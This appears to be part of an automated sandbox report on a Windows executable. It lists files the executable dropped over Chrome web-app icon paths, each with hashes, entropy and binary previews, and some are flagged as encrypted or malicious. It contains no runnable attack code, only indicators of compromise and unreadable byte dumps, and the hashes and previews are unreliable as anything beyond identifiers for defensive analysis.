Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	25673
Entropy (8bit):	7.9939633129255085
Encrypted:	true
SSDEEP:	768:3U+l/mWGhtxiV7eSsS60SAmxe5B9m5fLuK1VC3Z88eMK:3UO/fGh7ioSDilSK1VC3deh
MD5:	F9D097A93E0D84C55B28E3E406827376
SHA1:	4D53B3C1A278BE4E516023B152443E3A4573D83C
SHA-256:	4458046279D68BC861963B6BE374EA087E3CA7B9AB0884151EBEBDD7DA44DC53
SHA-512:	298D09841C25F0BC1C863FE6C25788D7DC1F12E74C7C459300823C5E4A62DB18538D6EE8AE2CAF79F49FA7094247213B721720C73B4E9AA6233099EBEABA2B25
Malicious:	true
Preview:	.PNG.j..$.......\\|.t.p.L..).O.aQ)....f.....Y.....E...:..Y)1.%q=f..n.$..\|.K.9E..7.R3l.w.el....q..v.(....x...$,@.......cS..u.4..[.+..7.V\|.i.w.m.l.....gz.K.]..R....E.t.7ke.B&Nh..9B.....J.=...4.u..]\|..X..Lvf.m.}..dA.l..=..9.........<....S6.Y.K....._........@._h'i......'U...Na......c#`....6....LQ@e.7..3%q.(..u..A..W.......U.OC....3...\N.......v..9`[....pl.S.hq'O4......fX...Tw}n.4J6."].'....GP...3.4.......;@'(..J............,[i-..nL....,e.....E.Y....;.....NI.....P....M...xF.R9.T..w.k.G.j.Cr.. BZ#[c.{.6n.\.X.......>.."...z..+..4Q..5.....+\|...t.#JA..A... :......=.].g..`X..0.!...kP.G..vv x.zi(..9 .jGT.E(]i.j:.m..F....g...>..!?...T.).g...>.........../.,...\|Z...(.c.rY.v.d......^'CH.`.O...Qh.j)..U..s.$.e.^..V Dlq.[V...e..........k........2{B.CH.8.z.1...:.p*>...<}@.....3..%.=w.....Gu.....!.#.Z..S...g..d2.0,.\|..%..a.:......2.....5.>..0E.%.D.5..^..0.:.L.f..a......~.-...5&....YJ)..?..3....Z....J...1...P.v..0Kc.Z....v..JNBjk.8.....C..j@..PP\|={${].

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\32.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1823
Entropy (8bit):	7.8743531472906465
Encrypted:	false
SSDEEP:	48:Q0ULZgmln7g5RcJEQUw6hPHY+0W3zFSx3AYMm90/eY/Mifqe4OgD:1aZxciEQUwEl3zF2AYF0HMbe6
MD5:	4A3EEFC211932FE5039B61B9DE3585CA
SHA1:	6E07009C5BA7A53B37401068D33E316990DD56D8
SHA-256:	FAD4B8217B83675E773089AE59D284797308A608655E5D469EB1956AA11F5C5E
SHA-512:	A12D8E21F32D3229309F6E8C3259B02C26F5517CA8C8D39E3ED66E10ABB38CF31D7D898BEE55589A5BC01B77CD2AA3DFD8D35B6107530AD66F752EA5381F6057
Malicious:	false
Preview:	.PNG.vS)4Cb.... .....@-].8..C5......;?..(w_F9.=$..<.z..I....Z.......).{.B.#.]~.\|...J.1.........jw.[..@v[S..W....o..7D....$...N....W."#s...mJ.A.....#AG...f...S.jj.....X.%L{v=....l.F..^ST.9....!3..Je..1../......;.0.g0g.L...o.G.....$:{"xA.Bi./..1.....(P.....6.jsH.i.."....[].......\|..s..y.....`.I2o..e.\|.....<....w...W2...E+~....Z.s.;.tV.0=....{..I....5H...V3..W..vb..N......BY.y}.XGU...g.^`;......\..Z...1..}.s=o'g.#....z.^]..+&.....!..Ev1. 4....86.....:R..".}7..nz.....j6sUg..L.L.j..,c..Am..>.r~O(h4.}...+....R.<C.7...P.3%.5..P?..'....X.Kw#.4...\|..o5.]. ..&U._@Z6.Ug.....,...K...@`...Xj.....@\..............=C.bjX........5.b.S...qA~[.)..Ba.#T.%...s'..D^6.O........!p.0.Q:.'......ZD.1yL...T..,.59o...D.CCa.3.H.D.z.Z....U....0S.7.o....[.....pJc..u..c;.1f...xb.Q.+...W&..:M.8u.B'..h.{....z...1.x:......"...D.n."-m.....D@.w.d?m.".y.`)...!..]....uY=.......J".I.[....~...I..k..T.*}_..? .....oq....t.....s,....HPf..4@t.....q...$XPX..V...i..$..1.?.e

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\48.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	2747
Entropy (8bit):	7.934144817292472
Encrypted:	false
SSDEEP:	48:02sTX5ny606/szFEKHgJh2u3OAEMyqsGM2ngOM+SJlaXczzyYFkuwD:0o8LWufOcnCJlHKYts
MD5:	B2C6ECE3FED803C21815DEDA4AC424B2
SHA1:	F4F6C3F4E78ED5691A07DB923336C64C1D3FE293
SHA-256:	8E5B57F7A36B67E2A1F05EA0ED270A0436AF5510BCCC0F8C4DCD2CC070790CE3
SHA-512:	02BF61BEC4E307943DFFE1F245D83DA4286F4EEECC724D093EFFB17A18628642B8033831C46531171ED89EC4F218CA717F1EB318E9528ED0FFBC5AD5F01DF091
Malicious:	false
Preview:	.PNG....x......B.....8R..5p.3.l..H1.NL.R;.<.I.b.f..i....p.'.......2.Pu....<ig....AP._n8b...R.sY.s........R.A.1..u...g...R.....83.9.0.m..~m.[\|.RE].....1.=.u=..K.z@..........~Mz.t..=.O..............@..4o...c....~...7..1.6B..N..6R..f6..B'f..Kca.m........h].4,.'JM..Dx.......k.ljhg.(D.m.....rz...4..g...H....:3].t...N\...z..o.ga.....F......d.tm.Y..)fO!R....I7.l..C..=...c..^....W.I.?..e.......Y..Rp.N{.t...[...{..Ua..........>..96...:e..Z...^....pX.5].%........L.(V.n..5t.....`...`..kWbk .X.L..^^}.3.,3...G......&..... ....[.....l...2J6...$.../../..w.{..n..=.....R.z.]...S!.D....BC.n.O.PSh...4zO.\.....I...~../.2...B%....>{.Y-..+.........l..w....6.....].S..:Zi1.ru_..u.....w'\|sGI.....:..nY..;O..P.v.=..;.HR@.?1w.....p..Br.STe.WB....&.wha\|.#K.A3H..!..#.{........K;.p..Oe.........}.C_.U.\>'.......W...U...8.... ........l.a..^....@...J..d.ch# )....(.k...Z..v..R..........g..[..;.b.n......2J.\|..p..>...T..<'....'..3..;b\|..XXV...Q..\|.+H...........

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\64.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	4111
Entropy (8bit):	7.949936786165925
Encrypted:	false
SSDEEP:	96:tUEAd8PfwLG0hFjfpBpUWinOVsinMnQPXwj3+Wzgls:tUDmwy0hxB6lEuQPXwjuWzUs
MD5:	B506C030F5FDB0F2F82015154DC85B28
SHA1:	6437DB3E933FB57B3E0AC61E9250C924239D5803
SHA-256:	8A2EE33073057A42F4575F5FBB2A0E06884F4C1E512B75CAD1803365BBE05977
SHA-512:	D3F0A3435BD5ED031B29F8F0C9C884C4CDEAC90C0599F81165F8EFD27A20055C1816F7C5B1FFF1BF993F646CCBEFF235EF9E6B6B098EBEDDD9A51D46134C76EF
Malicious:	false
Preview:	.PNG.J..#...6&n..3.e....T.........TC.Z..aW./6b.H.....S..q....SIL......m.\|...;z.C.b...bV.k...n=.7.......).U.._.m...%.f..Hk.pH."4..5.!..........H.D.\K..Y....tR.. Y... .5..........<.Cs.....+...im.._Xfd.2..=X..R...U!r1.v...s..>m...}../....y.....[......+/t.5.YZ7..t.Q...~...t...J..s.\|U...B.....\|/...`...q0.s;G...M.pK.X......m....G...s.}..E...d9a.q........A...."Xf..#.d...8.$=e6..Q_.Y..#.....w..`.U..<tL4.....~l.[.!.g.Y......#....3..Yk_,.n(...d4..%jI.I../LJ.q0.s.8I...Q..C..-S.[.....k.RXI..p..W+t[..p...qf....e.OG.z..R.a..8.F.a..?.D..`8..a[T\.e.{b.S..b....2..L..#Z..&....U.....8._TTB...\|......,DQ\....$w2V.U!w..t..Z.L..E...1S.He;kVU.5F>U0.......H.)....84....?..T...c}.jzt..O.K..H..........d. }....u9.M.p..)d....wW:..Gd.. ..g...oHD..{.'...w.6.'.N.ki}w......vo..u..+...OE....R..'.~.9...7.`..}......f}g.$......SB..T.Qqp.......GFg..W.\|..0../.....;....F.6..a....&........\..... ..H..!...+......3...d.O.C#Hh~......J...E.n.)._..xr.j.0.CI.d._.30.4.......R

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\96.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	7049
Entropy (8bit):	7.970794535964921
Encrypted:	false
SSDEEP:	192:thGcywKrx3iL10o6qo5suhn2V301Jnyn3fn7h:tIcWra0o6qyYV38+9
MD5:	0E214E2B74A4EABAF7ACD0EFC7E2E99A
SHA1:	3315E6BE97B49A0AAD6174F95BA5F97601EF815C
SHA-256:	6B447CC6AD4A09D4F24E5ED4A60FC57F2ED33F09A48458CBF0A1C5D90D202615
SHA-512:	A4593C4FEAED7E3F870AC8C6AA40CA96C802583950E1347D13DE598C99561504DCA104C093D026E734168266EC9C8D1FF82D88B63C5BD7A61FC827B7427223F8
Malicious:	false
Preview:	.PNG.Y.q:.D?[k.~..y.i.E.......vT.........Ce...........m[.F=.w....r.`.O...G..h..y.%.C....q.......!#E...0..(t\|-.... Z.....E...F...;.)...^^.\..9!x..z?z.>.h..L.)."^4.5....1..H.b.....7Ts%.........-..{0.Bd=..eZ^....k...%...F3]..-...6.]...x..{hD...-g..+.0dl...`i w.5H....O<7y..f.25B.NP..a.....S./../.?,,^zLE.'T....c......@.)8i.....^.....2..............n\4...>.V.I.JQ..v....Q.2...b..E.+..v...)...M...#CJgIX.t.e.n..-e.;.w......L.P.A..8.....U"_.SfS.v.Z..}...W.85.NT3..p.r..L....i....'......%....{Y.\...zB.<...c%FYs..7...v.1..."...64..W..............W7..vm.=..U.!&N..,].pXD?a.fy.._....\.[.....vw7.%qbY9..6B..tE;..6...r.,;4."I.&..k..T..\|..J7.....]..\T.j.E.c.k...B..n..!.).`.sU.4.b'.f.................%].M......]..\|.xT...8.\|....$.f..`...B0nX.....F...........'.^^ ...U..i..(9..*..W.-..})..6k.m.i...2...1.@..s..J.dO.8o..a.pE..2.'.]...0o..e.+...l.{....e.C.]r2.,....A.}=Ig........3....y.g\|.W...].6fX;:D.....!.w...E$.n=.. Q........h.Q......>......9..c9...7...

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\128.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	2642
Entropy (8bit):	7.929673355975747
Encrypted:	false
SSDEEP:	48:utNv0wu6VFCPJUOK3AHEm1jxWnAY9+raZ7a2R1rp69AfXGSudCEM2bcNh3b4QD:utFA6vCPqpiEM8nAY9qUaSrZfsAEMVrd
MD5:	CEF6DFCEB828F5D98A6A17EAD46AEC0E
SHA1:	280F1B285D68E01BC88773C849C2AA24A5FDAB52
SHA-256:	801702444DA5CC6663EA96C913A0B1D924689645DF07FC452455797F91E5C829
SHA-512:	72DA1C1978CC718DFA8BE01F5E7D17DA08CDF0DA96770BBAE8624ECD1EBEC95C73A10FABF83BEB4CC0DF19DDBC435F11736D66CCDE6352824F56B33DF99075CB
Malicious:	false
Preview:	.PNG.G..)X>.}..M.YW.l6..L,.x)...u.....[.,....-1^P...$.\|.D"t..A.U.B..U[.>...Y.I.}a......h.......K\|..o.t.....h.r....."........~J.[....Mr5..P.^k....$M..T...(.L.........\...c.....D.D^..1b.\.].&.c9..ao.8o4.....#.^.F(]+Jq.<g[P....}..~........K....b.vq......8.9...qg.$.N....?...VU...).....u.$-(......Dh..L..!.;...g4i%..rB.5.6.o.YM.. .d.S..dp....Bq......<x.._...5....8.}.-.K.S.t#.%.'^......+;c@.7...v...-t3.B.......X..e.....8.......0.$.C.q,...@.h.C.....o^.qv }.j..:.b.?....O.:.g.h#n.>P4.fL.f. .I..:I7p.:..iQ@..,$...4..(.i..\|VP.Iz.$..\|....T..(.t.]C..X..T,^..O..E.....<.....rS.v(...[.s...&..y..d....F...0 .......,n`..>E....?&.V.TE%n....g}8LK((.q#....WIV.........b..D....5.;...Ra..RP^........v.'i....E..>.V.Uw..U._7..B.BF@Q.....y.M....M.wk}........r.%.q..Ret.8g..^.%.....r...r..&.K...w...e.lu....:.v...j....~..#..2.1oc...`1..P....$.d..U. &..m.a...N.BE..B.p.].)q..\..y<.np..L.B........^....]..3R.~..@.T.?.....0.......`3........4-Y.zMSu..E.. ...[U.......

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\192.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1629
Entropy (8bit):	7.8810524179433505
Encrypted:	false
SSDEEP:	24:UTrQyjqYsHIoujiJnAfCLmS6jMXRzXElYqh8Oi2pbrzf7RyVxloQ267XWfNWKCZ4:W+nHDtmqlBLdOTHzdm7hJKEXsD
MD5:	895F05F6274C8D747CE2A1E6F090B0DC
SHA1:	C06B51C3D3FD61AD6E8EEAD96BB5D6F2CD54D955
SHA-256:	EA4DFAFDCED9ED2D1954089A43D70ED21621DCD53AB4D503B567853AAA5F7969
SHA-512:	EBEB199F550D50496A632DB6CD0F5DCAE0DF11D4E90125736CC9EAD999799F1BEE5370A15DE95D38C7359720799B9B0964B6E6D66779FBC2EE823D0B0A184200
Malicious:	false
Preview:	.PNG.u.F.-%....Q.s...(..fq=.2v....Y3..7.....V..s.A....a,.....'.i.C.>e<.......0-..'>.V..r..j.......N.<.@-&G..0..GV.W...K.....b......sZ..T...rO.q1M..u.Sk..<....jpD.3..5.o.y..[.H...Wdl..9s..W....o.......z...I..X..u.Do. B......;ZK&..............!>....7S.Y0.B~...m\.}.B.....h..h_..\|..E.....p..D....7....pi..0K@.1.n.7...p.......;...........<:.lu..@..}.1.........]......a.cA.@tsM..,d.....vb.4......K..Z[%...m.6:..!g;dD...9...Q`.a'....\|'i..7V.E.T.6wD..pY.....u\|...>....1..Q....Rao.\|.X.+.W}........!.. ..\|:.p......_B.............,..O...N.E.R.^h.P.c\..0.&t......N..z........Z&.f....v..1......).[..T@..\.ci.yx...4.........9..#.X....#t-4..rO...r.P.@.M..p.M./2~/.-.4%.W.,PL....<S.!>.<.9U..h...^.=.T3..{. .i..b.sH....q.AY>.<,Q..m......)0Ur.y..#. .g .H.~6.+T.@%$.....f......?U.^."T....x........$S.-...)9.a7...K@......5.......sd...$.;.....k...!m.s.i1~D..a..6...O..}.qU8n...q....2..^.v.....]...t...........'PP.B..)z.h4s...v.....X.6.`..u.....Y....M

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\256.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	5525
Entropy (8bit):	7.964038854719876
Encrypted:	false
SSDEEP:	96:Ql//uFUHLwX4NsYqbfhPhlBBTymXsPnCob5z279jyyQlPtx1+AFek0fvoY78A9:Ql/MwiuqDh5gMs/CobRA9jyyQltz+zfV
MD5:	CF8471670A85CEAA1EFCECB31DE41D0E
SHA1:	A30959D5F6F0BBE0B04F8DF3859F1BEA595B3976
SHA-256:	71DEF8A1064DB9694B64DF4A3F376CD6CEEC08C9B556343FE4475E8A5BAAE310
SHA-512:	7BA1E02C352E8C9FC6A91DCB1A32EB5A728FA5AA5D394FB1895CD9396C0058412FA60558E08E512CAB5A6C65086337FA8BFBCDC2B55536E5794B23BD4FE77015
Malicious:	false
Preview:	.PNG....'...v=..$......^..=.i.....~.VQ7......rx...-\....G.5.......=..v.e...\|.`...Bo9..H..u.........R@@r.]>.......:.\.,......V.........W.c..N....7Q..^&.....C...b'/,....t...v...:.r...B.r...\....>...........C:.S...KW.B..._........M+.t.../.4%.....8h.7.V#;r.i...s.....N.DA.....WE..m.XPR1.Z9"...8...i.A....t..@..+.}....Z>....XB.#SnJ..p.W..t..q..!...b3}Oe.......g.{-...,..fqi.6..]n.+eiyj.2.....$L{>xIw\....v~k..$....x.S........I"...\|...x+w.....2...[..)..Fs...2.....q.w.......?.+..3....<T&!K.a....W.xu..._s.D...2...P#.@...8.Ki.......:..)..j.&.6....H.....w........d.r,v.0.f.d.E.s..?_W.......>3...U.?.`..m..8.gt<.........p..w..c..(..#..`.....T...N.6.`6...r..$11..B.. f...`...L.U.o.;..7r~.C<.V..).......eb\QN....D.HG..z........h.[.B.v..,s...$......^.t.......=.+...........w.!.cZ.G.uj.i.;a..!/.$.b..0..).t.4%{....(\|)..\_.D.#s.i6&.....Q..... l..%.8.GEY..u0.n..A....jC.....".8..$jG-..b...Qh6..n..4#.3.9.a..'.>.._.C......a(_.Z>#.C...y.<._:.^.`{...Y...1. ...G..

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\32.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1359
Entropy (8bit):	7.8470436207124825
Encrypted:	false
SSDEEP:	24:34jg4ya3uZ4SoRMdBPxF66JuUI1r9fxuky1sr61R6HfvRPV/3kic/bD:oGpd46ny9ZE13vyf8iAD
MD5:	F6C2C81B701113F1097E321E53DB4B5D
SHA1:	1BC7FF4B8C96DB62538990028310A71F25FD39AB
SHA-256:	89E26944E9427F10E049385C5FB9EFC56EAFE46E076479AE2DACCEB047199D69
SHA-512:	CD157D489D3C4B500453DF713011730C0130A111CC70CFB902176A46590F33EC7A7C5461B4BD3A422A62148D22403E0DC81CA5315DB10406B28B17EC73D91417
Malicious:	false
Preview:	.PNG.(.....T9/c.`.,Ih@.... A.Wj....gV.k...........\|1.Q}../.>p9\.n?1..x..Z..D...=...U.9}f...d.E\...@4d...(..i..7.1...!...u.....!j.XTG..8.b.nXh&.IjX}'...B7C.R...K.... Q.N.$./V...Z.`..^b\C.=.k.....3TK_..a..J..s.L..\|...M.A.4.. WA........,..m.^...A...Gj..i..uB..t.'.i.Our2...9.4..3...........d.=v.h...Fc...Jl..0'..S.,B..>...c..`..B.]..MNr\|...Z...Z....].^#ub...D..T..`........\.^,.[.".K2`ey8.....M..z..jg...r.x].....#.1.....7f.D.....s...C..&A...\3..b.[.px&&q.X.T...h;z.}G1..}T.......HM.f.#.@. ......U;o".......u..0.U.}.oF...q.......1'd...\o.....,...$ !4JK.....??.S.d..n..v.M..$...o?....kO..b...[.P'...2..).sc8...8C#]..jD.`...K...t..=.8:....9.PK..]..:_..l...Z....0.......aO..-.B..i.K...D....8...!.......=.i....xk...2.[.......?E..&.D3VZ..C..h..m.{.u....=..j-...DWx:....=..\|a..;dgXn"c.`.r.qh.L{-.!Mf.f!...;>3....Q .e.y\k.7..1....A...4.......q......w*.-......Z.:.e....>.#l.......l..U..v3...!...MJ...i....`F,.`.V.HU...].r....8.f.=.../.._P_.....l.......

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\48.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1703
Entropy (8bit):	7.871106632070574
Encrypted:	false
SSDEEP:	24:NJszrPPHWBkW8GPzvt+KA/t7+i1hHunwiMC27KMz32TjDbCHpLIgBHSEK8zPYfSl:9k7GPZ+KY7X1hqeC2WMij3KLnS0wSdD
MD5:	C59825685457BAF192B83432BD3F3827
SHA1:	DEFD4F3E8C73E2AB23D32C7CF45C8AF748665B00
SHA-256:	075D4DAB7BD727F16AEB40E7167373C9C686A5ECF82642D7F56AC5B056AF2573
SHA-512:	CDCAB46305E62F0754D740A7A824C56D384843BAA1CB205076FBE72A5F199641A3666A62C8DEFC6A23F7D9331998BED12548A63DF33E08AD70BA25BACB1D099A
Malicious:	false
Preview:	.PNG..{.s.gh5.#e.\..x.]...f9i;...`C#...F..-J..Cc.....R......5\`~%.$N..y.L.-T....d..........!.....E..]. ...P..;e.l._..&_.E^..\|h...s...\|.b..5.t<.P.....Zur...PP..."....Q...A.b.q..../D...lt..F...E$!..$+..(P8..l`.)$k.l_.X.)Ow.\......Wx..`f...\W...kB+.5.!>./..2.(...g/...R.......:`....<.f...p.Qf....h.'x...[.D...U.~zzf.4...&...>.......\|O87...'-R_.m.L..."..d.D...2<.%..u+cF........8t..]x.....N.a.$...2...z....4.....N...~..../...rg.B.f..m.iz....DZH.5.......`....6......_:s.> C...../UY.[/x-4....,y..h..#.......V..O../v.V..`...`%..J\.........X.h.T.@M......`..F...np.a.....1....pn...m.>...(r:)....'...J.c.sGY.P..M..[y. `........kp.....$................`.v..n.(.v../y..E..1..RI...u.] ......+.O......d..T..F.f.O!x.#.\|.g..@NM.0r.-..y....c=...C.....P..D...<^....t'I,.=.)..a,...+.2v..d.]..m..KZ_.....P.N...gyN.K.U.s.U..........o`.-...V....5.fv?....?._..a..j\."7.B...'.:....#.@..5_..)1.b.7.j.w..]7.-.n..f...g...j...?vG..-.b..+...E....0c-....n..F.b?W...ptJcj.eP......=.h.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\64.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1848
Entropy (8bit):	7.881089842830607
Encrypted:	false
SSDEEP:	48:8KWxQRf+mUI5lE4uNsVxBoOODnTMzMrYigb4xID:8AX37b9V/oXnvKb4u
MD5:	26CD041711BDF929BBF18DA2FA7F4695
SHA1:	440F7D4EEEB257C44CE8037CEF2521F1F98E61FF
SHA-256:	061FF6624594410DDC63E874A972F7DA37EA153B17A2555D9A813961781E0C3F
SHA-512:	F6C9C67DF8AE96FB49063335579DA6E8DDD3E10BE06F859C15D346EA249B623C46D4A2CB9665A609309D6291D34AE5883FE0416C72288186EFDA9C36F2E3DB9A
Malicious:	false
Preview:	.PNG..h4...K..M$.G...[G.\|....F...a..WLr....gh....~.-......2.i%..k.H.P.....lX/.t.?...WAx..N.E...&jZ'...EPQ....o.H..S.v....M..gd...B..].......f........s...dP+.....?...<.q]2.+..X..P.1xi..6.Z_..\#.\pq@D.(..d..K.q...IS.g(..d.0...K.s....!4a.Y..8.4@...2o/..(..:{.@..$.U..%..U2 ...-....;.4..r.~..M(.-_.K."F.Y.....%....I.<..=B..@:.uq7..aqC..Sy(.2u[kj$Fi.B,....e.....U.R...~.......0..#.......#.]..9.Wt...k. .c.~.....T.....).W...x'...U.....BE.m.A)=......;y..U...h_.:e...V.j...X.).....JH1\|.i.i...G...V.V..:X$.9.^.g.b`......EV.{$,.f.G.Q#$BJr.\|m]H...i.TT.o....../.R..R..T..O.....5....=...?-.....".N.S4.n...f...5..DS.....=.~.f._.^~,oTF..L[!P/.`l......b0....H.).{Rq0^....I."...1......+N./ ..KE.2..."..@eU. ,.....Z.E...R.&..m.#...+..a.........@../sG.<.(.......Y.$.....].....=l...I..Pe.i....(.k....R'.X.>Ll$.). ......P..p.........aW.N....S.rIt...7.1B.~#..).4..G.L`.I..2.'i.....w.P. q..A?...`A.F...b6........{.H...........I.".u2..h.][.n.......d.2{..2...H..,...Z..c.$\|{o].

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\96.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	2181
Entropy (8bit):	7.912922003197393
Encrypted:	false
SSDEEP:	48:OBSsJhKADsIPrD95C1GXg3akOpbCD3D22TD:Ovo0C1Xa2D3Dn
MD5:	6E345210FC2D34B97F06FC9DB777695F
SHA1:	4D2F770C6539DAD0A55EE681C7596FD92C6ACF4F
SHA-256:	E58880706CD80706535EF7E1E0240A8027BD7F89E444C7B0963150DD1EB367E6
SHA-512:	453AB1B6BE975D75CA6844DFED54D75BF68C7C179E9816BBEC935E7D18D1CAB730966CCB16C63E88E7214820DFCD707AC3AED54DB90C45E7C0F05CC70922A6BE
Malicious:	false
Preview:	.PNG..g1. .o......].OL..)....0.D...,..~.&..E..%...s)"<.....'...K.].C.?f..a......v...B.2N.nh.({.....LN^{..fQ...].+\|M.....M...WK.q1./x.h..ZY.K7.......8..`.. ..&.Q.$..^X.s..^W2..J.i.?G...ftVz...@...U.>..e...r.U~.i.kq.0.0.,E.+0..G...zc..!..e.4..7...Ez..f...............21&..B..x...nH>.-..Nw6.)..}iT....:.=.\. .R..?.\|...j.6;Y.K;A..F.S.!@`.%@M.e.w...'....fe..uT,T..{x\|..k.}.e .4.f..f+.}....O.....w.S....)..`....,7R6.... ..:v#`X.S..J?X@Z...+]..t>".,HI..A..-c..Rj..".....?.].cR!...L...7.&........GhJ..Z.$y.'..........4",..v.....`..Q.z.T2........vl..l.H...w..'........K..M.q..E.$...2E....%.4q.i.H..,.YI...w..n.{6.Z..K./.-....h.yl................5..,#.}.......}.\|.Nj.N3.w..3...L.g..\!#.@...;x...Me..y)..6..cs....qP..h...P...@..iD.;..aO....1(}...c/6.o:.....n....ue.........C.....V?....c....b.E..ae11.>.......T(-...\|...Fq...'g.g.d]!z{.6.f..;....y.5"...MN..t..6.X...u...\..Q.6<.....z.`.rw......Z;9..:l.....@.4N..A....[.....k~..M...N.....Q&(...ux..7O....a...~<.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\128.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	5710
Entropy (8bit):	7.965591297004057
Encrypted:	false
SSDEEP:	96:UzTyqHomlHl+9iC0YSHciIt3b7CTdAkJRpRHqf60xTRb4KA9qpELguwICx:UvBs9Ltz3b7sCkJJHqxTR0KSVLY
MD5:	E1426FCB7CAD78606D359D9B8269B580
SHA1:	2B4CB315540E14A5C001ACF06F8782380C8830C9
SHA-256:	0FBDB9F0BD2B72FE9F808D2AE56D95C865B5370BB78A2DBAEEC57A73CB54E92B
SHA-512:	A5D3FA5FD3890CD689C2C11DA625E8D0A1763F7154DC0F30B9065A71CDB89088C2038C1E617A3DB36AFDB61031AB30465D72A8B83B234B4B6082C36ED26F6D02
Malicious:	false
Preview:	.PNG.;..x..W3....(.....c;. ...M.L.u...M..'........c..!./{...vR..M!..B..'..4..`...ZkSkh.cF......dA..n=.........t.....!.4..EqY'.^y......F......].`....!..B.f..4f.W^r......Y~.`.".&...Z...+v....^..G ....2....Jy.}..a..."..Q&h.~...%..!.....F..$..j.......5lZ]=[r@.....'..@5..@....4v.}. ,..?..Q...I.....j.s.L..u....+)^......D.V .s....?z:.`D..\g..'.%F...P.;......u.f..g .....[..?.nD2.?.....{..Se..Mmv.u...-.T......?..$.y'.....E]q.c.e_v.[4.i..X.fz........=.V..#^.Gn....j...QA..x..H'Yq..f..efom.e.........F.OT...Y"<v.........$..3R...I}...:m4yp..}..=-..........V.'.u..#.ou.. >.(....;W..Y..?..ZA.<....`..L.}...=...F.o..RT........~.....}....>2..XJ0..:.^.1....%..B.OU...Y~.....w.6WOK...KW.:..^..7ED.....y1_.....T.....I..XP...6o.)......Yfk:.#P....5`c.\|."...2.Q.I.\LD...-...q{K-.q...x...m"\|..\..X.......(.(ij.....(.......I.H..j..s.HSg.=.)T.."m..k..aGi....h....b......66.R~...RE%b]..Y.U.G...3n5..O.../H...K..........O.4.Qy1.8`m...VQ...5E...0. .p.o.W.).......R.*

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\192.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	3253
Entropy (8bit):	7.940311078925311
Encrypted:	false
SSDEEP:	96:PHCAO1WGsP+l35p3X5mIF8MI61mh8nqmWHbH6lQagZ:/CAO1KU5mIiMdWjagZ
MD5:	1923661F5B1A73C6E89D0837CF3EB028
SHA1:	255FC273BB1308D65F18B416FA3A59342D605170
SHA-256:	E024E96CA2D4F34B799BA46BC53C73D8BF4F4C032476559C25ED14FC765BA096
SHA-512:	FA6AF046B2D62177074C216544B6701BAA721C7E39A651116ABD0E088E2CEABCFF09D3270C86EFB31FB18BCDFE4376B7E224DB94D7F899A2993397E51155336D
Malicious:	false
